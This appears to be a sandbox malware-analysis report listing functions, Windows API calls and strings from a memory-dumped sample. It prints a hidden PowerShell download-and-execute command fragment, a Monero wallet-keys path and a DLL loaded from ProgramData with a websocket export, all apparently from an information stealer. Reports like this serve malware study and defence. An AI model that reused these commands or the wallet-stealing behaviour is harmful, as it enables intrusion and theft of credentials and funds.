Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 334d2e32598ca80df67824a649dddcaa399fc75e038bad6a28a46e6c7a15f3b6
Instruction ID: abbcbbacf178f820582ea4e548259568adf7185fe51347649e98cce4febb50a1
Opcode Fuzzy Hash: 334d2e32598ca80df67824a649dddcaa399fc75e038bad6a28a46e6c7a15f3b6
Instruction Fuzzy Hash: 85312EB4A01209EFDB14CFA4D845BEE77B5BF48704F148168F911BB284D774AA81CFA1

Function 00E2CB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

memset.MSVCRT ref: 00E2CBEF
___crtGetStringTypeA.LIBCMT ref: 00E2CC1C
___crtLCMapStringA.LIBCMT ref: 00E2CC3C
___crtLCMapStringA.LIBCMT ref: 00E2CC61

Strings

, xrefs: 00E2CBC6

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Typememset
String ID:
API String ID: 3530896902-3916222277
Opcode ID: 38abe3c77c6e5573dca20f7b5d840e92e9ca0f80477a8a236b94eb5a145043cf
Instruction ID: fdfbd1e76ce00e20883563950f103d7d075a4e39171827d7667670e36ab10a81
Opcode Fuzzy Hash: 38abe3c77c6e5573dca20f7b5d840e92e9ca0f80477a8a236b94eb5a145043cf
Instruction Fuzzy Hash: C541E8B01047AC5FDB218B24DC85FFFBBE89B45708F2454E8E98AA6142D2719A44DF60

Function 00E249D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0099F410), ref: 00E24A2B

Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B

lstrcat.KERNEL32(?,00000000), ref: 00E24A51
lstrcat.KERNEL32(?,?), ref: 00E24A70
lstrcat.KERNEL32(?,?), ref: 00E24A84
lstrcat.KERNEL32(?,0098A6A8), ref: 00E24A97
lstrcat.KERNEL32(?,?), ref: 00E24AAB
lstrcat.KERNEL32(?,0099E488), ref: 00E24ABF

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E28F20: GetFileAttributesA.KERNEL32(00000000,?,00E11B94,?,?,00E3577C,?,?,00E30E22), ref: 00E28F2F

Part of subcall function 00E247C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E247D0
Part of subcall function 00E247C0: RtlAllocateHeap.NTDLL(00000000), ref: 00E247D7
Part of subcall function 00E247C0: wsprintfA.USER32 ref: 00E247F6
Part of subcall function 00E247C0: FindFirstFileA.KERNEL32(?,?), ref: 00E2480D

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: a74ede6c86167300b7a874fd00e1b3a5bb0a01b81571ccdfcd743e0ea1d83bff
Instruction ID: 311503621352c526ee3598d427847a502b7addbfbc4f273770acfbc74fad664f
Opcode Fuzzy Hash: a74ede6c86167300b7a874fd00e1b3a5bb0a01b81571ccdfcd743e0ea1d83bff
Instruction Fuzzy Hash: 473195F690021867DB28F7B0ED85EDD73BCAB58700F40458DB245A6049DE75A7C8CF94

Function 00E22EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

ShellExecuteEx.SHELL32(0000003C), ref: 00E22FD5

Strings

-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E22F14
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E22F54
')", xrefs: 00E22F03
<, xrefs: 00E22F89

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 327271982e049667bdf8b58e40072cc6e1f3b215b168da25b41b492da87e5783
Instruction ID: f01a01f24ecf72e907f160ad07942e001790e526e52c95b0405abdcd8263efb2
Opcode Fuzzy Hash: 327271982e049667bdf8b58e40072cc6e1f3b215b168da25b41b492da87e5783
Instruction Fuzzy Hash: D9410F71D102189BDB14FFA0E862FDDBBB9AF10300F486469E00677192DF752A49CF51

Function 00E8CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 00E8CC1F
dllmain_crt_dispatch.LIBCMT ref: 00E8CC36
dllmain_raw.LIBCMT ref: 00E8CC7E
dllmain_crt_dispatch.LIBCMT ref: 00E8CC91
dllmain_raw.LIBCMT ref: 00E8CCA4

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction ID: ad2182a34f43c74332ad05f86648f454d6b035243f3bfde2d38ba84708e71878
Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction Fuzzy Hash: 52218172D40618ABDB22BE55CD419BFBAA9EB82798F266115F90D77211C3304D41CBB0

Function 00E27F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27FC7
RtlAllocateHeap.NTDLL(00000000), ref: 00E27FCE
RegOpenKeyExA.ADVAPI32(80000002,0098BAA8,00000000,00020119,?), ref: 00E27FEE
RegQueryValueExA.ADVAPI32(?,0099E408,00000000,00000000,000000FF,000000FF), ref: 00E2800F
RegCloseKey.ADVAPI32(?), ref: 00E28022

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 4b87b944fc9598c6ffd484bbe89ac0a036c015de15d2bb1b1e6d0c77d362aa7f
Instruction ID: a2f3018cad63a3d9601eb45e73dd2c04cac74aa64af9042945b4b0671826147f
Opcode Fuzzy Hash: 4b87b944fc9598c6ffd484bbe89ac0a036c015de15d2bb1b1e6d0c77d362aa7f
Instruction Fuzzy Hash: 40118FB1A44305EBE710CB85ED46FAFBBB8EB04B10F104219F611AB284DB7A58008BA1

Function 00E293F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0099F458,00000000,00000000,?,00E19F71,00000000,0099F458,00000000), ref: 00E293FC
lstrcpyn.KERNEL32(010E7580,0099F458,0099F458,?,00E19F71,00000000,0099F458), ref: 00E29420
lstrlen.KERNEL32(00000000,?,00E19F71,00000000,0099F458), ref: 00E29437
wsprintfA.USER32 ref: 00E29457

Strings

%s%s, xrefs: 00E29445

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 04adc2dec78ec723048a33ffde8ec7394b7ede64c70df9e6a23a3efe953d2df0
Instruction ID: c381dfe02e09a9f337634a3992feb0d3729950124f75f02d4479c25c305b6484
Opcode Fuzzy Hash: 04adc2dec78ec723048a33ffde8ec7394b7ede64c70df9e6a23a3efe953d2df0
Instruction Fuzzy Hash: 81015E76500208FFDB08DFA9D888EAE7BB8EB08704F108248F9499B205D671EA40DBD1

Function 00E112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
RegCloseKey.ADVAPI32(?), ref: 00E112FF

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: bb825b5d2f215b7eb33c7f8fe1d083f5e0aca3b078f18c2557638e7cc7abf26e
Instruction ID: 49888f5dab3c687e99dccd889dc7f6dab2be2a1eaab64d9b882066599482cdea
Opcode Fuzzy Hash: bb825b5d2f215b7eb33c7f8fe1d083f5e0aca3b078f18c2557638e7cc7abf26e
Instruction Fuzzy Hash: 3E013179A40309BFDB10DFD5DC49FAEB7B8EB48B00F004198FA459B284D7759A00CB90

Function 00E268D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E26903

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

ShellExecuteEx.SHELL32(0000003C), ref: 00E269C6
ExitProcess.KERNEL32 ref: 00E269F5

Strings

<, xrefs: 00E26979

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: df7b11afbc6944a79a132080baa97a943ce1437bf70b4092f1ea462b2a94bb37
Instruction ID: ee51a5bc1fd587a6eb3c69c194ac582ff65deeced709dda71e10990237a93b37
Opcode Fuzzy Hash: df7b11afbc6944a79a132080baa97a943ce1437bf70b4092f1ea462b2a94bb37
Instruction Fuzzy Hash: 393161B1901228ABDB18EB90ED92FDDB7B8AF04700F445198F20577185DF756B48CF55

Function 00E28950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30E10,00000000,?), ref: 00E289BF
RtlAllocateHeap.NTDLL(00000000), ref: 00E289C6
wsprintfA.USER32 ref: 00E289E0

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Strings

%dx%d, xrefs: 00E289D7

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 789f0253db3018191f401208dfdc9921706c00200ab1ee1b600dd540b421a6f0
Instruction ID: 3bc22303a0b2a9cc85fd147eb14949cc4278f1de5d2d658fcf78ad9bc8f355a6
Opcode Fuzzy Hash: 789f0253db3018191f401208dfdc9921706c00200ab1ee1b600dd540b421a6f0
Instruction Fuzzy Hash: 0A2160B1A40304AFDB14DF99DD45FAEBBB8FB48B01F104559F605BB284C77A9900CBA0

Function 00E1A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E1A098

Strings

free_result, xrefs: 00E1A0C9
connect_to_websocket, xrefs: 00E1A0B3
C:\ProgramData\chrome.dll, xrefs: 00E1A093

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
